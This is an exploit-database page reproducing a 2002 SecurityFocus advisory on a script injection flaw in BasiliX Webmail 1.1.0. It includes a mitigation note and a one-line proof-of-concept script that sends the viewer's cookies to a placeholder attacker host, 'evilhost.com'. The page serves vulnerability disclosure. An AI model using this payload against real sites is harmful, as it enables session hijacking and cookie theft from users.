header-logo
Suggest Exploit
vendor:
BasiliX Webmail
by:
SecurityFocus
7.5
CVSS
HIGH
Script Injection
94
CWE
Product Name: BasiliX Webmail
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: YES
Related CWE: N/A
CPE: a:basilix:basilix_webmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

BasiliX Webmail Script Injection Vulnerability

A script injection issue has been reported in BasiliX Webmail. Script commands are not filtered from the Subject or message body, and may execute in the context of the BasiliX site when the content is viewed.

Mitigation:

Input validation should be used to ensure that user-supplied data does not contain malicious script commands.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5060/info

BasiliX is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support.

A script injection issue has been reported in BasiliX Webmail. Script commands are not filtered from the Subject or message body, and may execute in the context of the BasiliX site when the content is viewed.

This has been reported in BasiliX Webmail 1.1.0, earlier versions may also be affected.

<script>self.location.href="http://evilhost.com/evil?"+escape(document.
cookie)</script>

Navigation

Suggest Exploit

Services By CQR